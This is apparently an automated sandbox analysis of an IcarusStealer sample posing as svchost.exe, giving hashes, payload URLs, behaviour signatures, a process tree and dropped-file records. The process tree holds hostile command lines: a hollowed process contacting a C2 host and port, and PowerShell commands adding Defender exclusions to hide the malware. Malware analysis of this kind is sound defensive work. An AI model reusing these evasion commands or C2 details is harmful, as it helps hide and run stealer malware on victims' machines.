Analysis

  • max time kernel
    7s
  • max time network
    62s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/03/2024, 15:28

General

  • Target

    svchost.exe

  • Size

    494KB

  • MD5

    65c2533608f1aad7e7780b1b705f6717

  • SHA1

    688bd80975cede811e57d3b1d197eae97ebc4bde

  • SHA256

    ade93fc6c27fa1b57d864ebbcea4cec99bfb8556115496051bc8a10b0efde04d

  • SHA512

    77c409d60f60eb55062175c16b955fe5b71e7eb4f438c781f60dc010f8b88cdd21d068c0295e937bd478ecc2c94179e30479565f6a87f092d16dadcbbdbc785b

  • SSDEEP

    12288:ZoXzSuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QK:+uZ6N6LqQzJqkt

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3368
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4472
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP"
        3⤵
          PID:2204
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:800
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
        2⤵
          PID:2612
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:220
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4644
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3880
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4076
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2896
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Users\Admin\AppData\Local\Temp\Start.exe
            C:\Users\Admin\AppData\Local\Temp\Start.exe
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:544
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Suspicious use of SetWindowsHookEx
        PID:4036
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
          PID:4276
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
            PID:4084
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
              PID:3004
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /4
              1⤵
                PID:4724
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                  PID:712
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                    PID:5192
                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                    1⤵
                      PID:5624
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                        PID:6000

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        3d086a433708053f9bf9523e1d87a4e8

                        SHA1

                        b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

                        SHA256

                        6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

                        SHA512

                        931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        16KB

                        MD5

                        85f7b21f78ffcce8f30b0589ae6e1578

                        SHA1

                        14654f7fbc30e5e58d9bb6fa57360d3458fdc484

                        SHA256

                        e1365c3babc0f5f8487ad855a43970d8dba206eb3fc6b01ab9132a5c5813629f

                        SHA512

                        11ec10dc0eb87ea219b905f079c407eba390ec9b2c0399cb3f6e2014a0db2ac88c673b5d8a9b616338a3bdc4d2ed1dde432bf2fdae207210eca31dbcce4e15c1

                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1HCECE5V\microsoft.windows[1].xml

                        Filesize

                        97B

                        MD5

                        6583a2f89cc3c90f77ffa922acf7ee63

                        SHA1

                        eccd205c1bb4764f160e86cfd0d860976c32708f

                        SHA256

                        34cbdb325cf0420e4bfbc19da431b639890b153b6ac0635ce79ba37ffc677ac2

                        SHA512

                        0c7daec9157074607177f75d7ccf190027d9e1830d832cbf16426bfcf221258db4fba74ee35f20c85a9bd6022a1db0409a2f3ec84ecc7317142cf9759eead021

                      • C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp

                        Filesize

                        1KB

                        MD5

                        c94fa213d51f3046b4fee71f216be2fe

                        SHA1

                        d4b4e1cd9d16184d2ff5d687c13f3915f5d97e51

                        SHA256

                        52e15efb7ab936117b0424adf8df1ed4a0d346746097de7d525752d1cb455c0d

                        SHA512

                        07963f3c03c6de7759d2043fb5b62313a0c056de8570dc1ae636a4f61f3c3c8f74279be90d941c485df1a5972a000921b1083a2b2ec5f303e6169d8bf158f8c8

                      • C:\Users\Admin\AppData\Local\Temp\Start.exe

                        Filesize

                        4KB

                        MD5

                        65553b8955e11c0813ae56b6502071fe

                        SHA1

                        48ca68eb75a01f6a5e4329addb9b5b4b7bf98b4c

                        SHA256

                        647fffa6f573e913ec1f26b43fcf731e48e2d307f45f023c66d49d71240623f8

                        SHA512

                        ca9403803be7c0b07c39a12faca0aa3043507c1adae4bafb570868a9e6f8548786222e3c3d4c8724ffec10011035fa354318857864a4b4c97701d5d9650ebef8

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12weuq1l.24h.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • \??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.0.cs

                        Filesize

                        1KB

                        MD5

                        14846c9faaef9299a1bf17730f20e4e6

                        SHA1

                        8083da995cfaa0e8e469780e32fcff1747850eb6

                        SHA256

                        61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

                        SHA512

                        549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

                      • \??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline

                        Filesize

                        447B

                        MD5

                        80e5e8cec2758009460e985a799ca6b4

                        SHA1

                        89fc0e1ac64a3d23ee2e83086957e63dd5b7cd2e

                        SHA256

                        ecedde26d1fb9ab58e2e3b8cfbb41514cd629c0e531049bc0c1b0ee402465595

                        SHA512

                        becc050e4a07eec5710f59e371bd8653b0274f84e9323ac7509f6895fba6ad69c082deae3bd7ed68428a8b1487a016f3e169c846836c88c4c47eb52d3db110a2

                      • \??\c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP

                        Filesize

                        1KB

                        MD5

                        810535a8ae563d6aa53635a1bb1206ff

                        SHA1

                        f5ba39f1a455eb61efe5022b524892249ee75dce

                        SHA256

                        7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f

                        SHA512

                        5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

                      • memory/220-17-0x0000000000400000-0x0000000000424000-memory.dmp

                        Filesize

                        144KB

                      • memory/220-18-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/220-19-0x0000000005580000-0x0000000005590000-memory.dmp

                        Filesize

                        64KB

                      • memory/220-167-0x0000000005580000-0x0000000005590000-memory.dmp

                        Filesize

                        64KB

                      • memory/220-110-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/544-28-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/544-25-0x0000000000DC0000-0x0000000000DC8000-memory.dmp

                        Filesize

                        32KB

                      • memory/544-168-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/712-191-0x000002A77EC90000-0x000002A77ECB0000-memory.dmp

                        Filesize

                        128KB

                      • memory/712-189-0x000002A77ECD0000-0x000002A77ECF0000-memory.dmp

                        Filesize

                        128KB

                      • memory/712-193-0x000002A77F0B0000-0x000002A77F0D0000-memory.dmp

                        Filesize

                        128KB

                      • memory/800-85-0x0000000003680000-0x0000000003681000-memory.dmp

                        Filesize

                        4KB

                      • memory/2896-117-0x0000000007FB0000-0x0000000007FB8000-memory.dmp

                        Filesize

                        32KB

                      • memory/2896-33-0x0000000005440000-0x0000000005450000-memory.dmp

                        Filesize

                        64KB

                      • memory/2896-84-0x00000000701D0000-0x000000007021C000-memory.dmp

                        Filesize

                        304KB

                      • memory/2896-35-0x00000000059C0000-0x00000000059E2000-memory.dmp

                        Filesize

                        136KB

                      • memory/2896-124-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/2896-27-0x0000000005A80000-0x00000000060A8000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/2896-26-0x0000000003360000-0x0000000003396000-memory.dmp

                        Filesize

                        216KB

                      • memory/2896-113-0x0000000007E90000-0x0000000007EA1000-memory.dmp

                        Filesize

                        68KB

                      • memory/2896-59-0x0000000006960000-0x000000000697E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2896-60-0x0000000006A10000-0x0000000006A5C000-memory.dmp

                        Filesize

                        304KB

                      • memory/2896-31-0x0000000005440000-0x0000000005450000-memory.dmp

                        Filesize

                        64KB

                      • memory/2896-30-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/2896-70-0x000000007EE90000-0x000000007EEA0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3004-157-0x0000021F46DC0000-0x0000021F46DE0000-memory.dmp

                        Filesize

                        128KB

                      • memory/3004-159-0x0000021F471E0000-0x0000021F47200000-memory.dmp

                        Filesize

                        128KB

                      • memory/3004-153-0x0000021F46E00000-0x0000021F46E20000-memory.dmp

                        Filesize

                        128KB

                      • memory/3368-1-0x0000000000590000-0x0000000000612000-memory.dmp

                        Filesize

                        520KB

                      • memory/3368-0-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/3368-21-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/3368-2-0x00000000054C0000-0x000000000555C000-memory.dmp

                        Filesize

                        624KB

                      • memory/3368-4-0x00000000071C0000-0x0000000007764000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/3368-3-0x0000000005560000-0x00000000055F2000-memory.dmp

                        Filesize

                        584KB

                      • memory/3880-114-0x0000000007010000-0x000000000701E000-memory.dmp

                        Filesize

                        56KB

                      • memory/3880-37-0x0000000005460000-0x00000000054C6000-memory.dmp

                        Filesize

                        408KB

                      • memory/3880-61-0x0000000004530000-0x0000000004540000-memory.dmp

                        Filesize

                        64KB

                      • memory/3880-111-0x0000000006E60000-0x0000000006E6A000-memory.dmp

                        Filesize

                        40KB

                      • memory/3880-112-0x0000000007050000-0x00000000070E6000-memory.dmp

                        Filesize

                        600KB

                      • memory/3880-56-0x00000000054D0000-0x0000000005824000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/3880-108-0x0000000007420000-0x0000000007A9A000-memory.dmp

                        Filesize

                        6.5MB

                      • memory/3880-115-0x0000000007020000-0x0000000007034000-memory.dmp

                        Filesize

                        80KB

                      • memory/3880-116-0x0000000007110000-0x000000000712A000-memory.dmp

                        Filesize

                        104KB

                      • memory/3880-109-0x0000000006DE0000-0x0000000006DFA000-memory.dmp

                        Filesize

                        104KB

                      • memory/3880-36-0x00000000053F0000-0x0000000005456000-memory.dmp

                        Filesize

                        408KB

                      • memory/3880-34-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/3880-123-0x0000000075150000-0x0000000075900000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/3880-32-0x0000000004530000-0x0000000004540000-memory.dmp

                        Filesize

                        64KB

                      • memory/3880-29-0x0000000004530000-0x0000000004540000-memory.dmp

                        Filesize

                        64KB

                      • memory/3880-66-0x000000007F770000-0x000000007F780000-memory.dmp

                        Filesize

                        64KB

                      • memory/3880-67-0x0000000006A40000-0x0000000006A72000-memory.dmp

                        Filesize

                        200KB

                      • memory/3880-68-0x00000000701D0000-0x000000007021C000-memory.dmp

                        Filesize

                        304KB

                      • memory/3880-80-0x0000000006060000-0x000000000607E000-memory.dmp

                        Filesize

                        120KB

                      • memory/3880-82-0x0000000006A80000-0x0000000006B23000-memory.dmp

                        Filesize

                        652KB

                      • memory/4084-134-0x00000211C46F0000-0x00000211C4710000-memory.dmp

                        Filesize

                        128KB

                      • memory/4084-137-0x00000211C4D00000-0x00000211C4D20000-memory.dmp

                        Filesize

                        128KB

                      • memory/4084-132-0x00000211C4730000-0x00000211C4750000-memory.dmp

                        Filesize

                        128KB

                      • memory/4276-83-0x000001717E540000-0x000001717E560000-memory.dmp

                        Filesize

                        128KB

                      • memory/4276-87-0x000001717E8C0000-0x000001717E8E0000-memory.dmp

                        Filesize

                        128KB

                      • memory/4276-98-0x000001717D7D0000-0x000001717D7F0000-memory.dmp

                        Filesize

                        128KB

                      • memory/4724-180-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-169-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-177-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-178-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-179-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-175-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-181-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-170-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-171-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/4724-176-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

                        Filesize

                        4KB

                      • memory/5192-210-0x0000015CD6EB0000-0x0000015CD6ED0000-memory.dmp

                        Filesize

                        128KB

                      • memory/5192-212-0x0000015CD6E70000-0x0000015CD6E90000-memory.dmp

                        Filesize

                        128KB

                      • memory/5192-214-0x0000015CD7480000-0x0000015CD74A0000-memory.dmp

                        Filesize

                        128KB

                      • memory/5624-231-0x000002006C320000-0x000002006C340000-memory.dmp

                        Filesize

                        128KB

                      • memory/5624-233-0x000002006BFD0000-0x000002006BFF0000-memory.dmp

                        Filesize

                        128KB

                      • memory/5624-235-0x000002006C6F0000-0x000002006C710000-memory.dmp

                        Filesize

                        128KB

                      • memory/6000-252-0x000001E2A9860000-0x000001E2A9880000-memory.dmp

                        Filesize

                        128KB